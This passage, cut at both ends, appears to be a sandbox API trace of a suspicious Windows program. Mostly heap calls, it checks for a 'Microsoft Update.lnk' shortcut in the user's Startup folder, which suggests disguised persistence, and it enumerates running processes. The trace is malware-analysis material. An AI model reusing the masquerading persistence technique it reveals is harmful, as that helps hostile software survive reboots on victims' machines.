lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0310.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0310.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0310.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0310.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0310.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0310.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0310.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0310.089] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0310.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0310.090] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0310.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0310.091] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0310.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0310.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0310.092] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0310.092] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0310.092] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0310.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0310.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0310.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0310.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.094] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.102] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.103] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.104] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0310.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0310.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0310.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0310.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0310.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0310.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0310.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 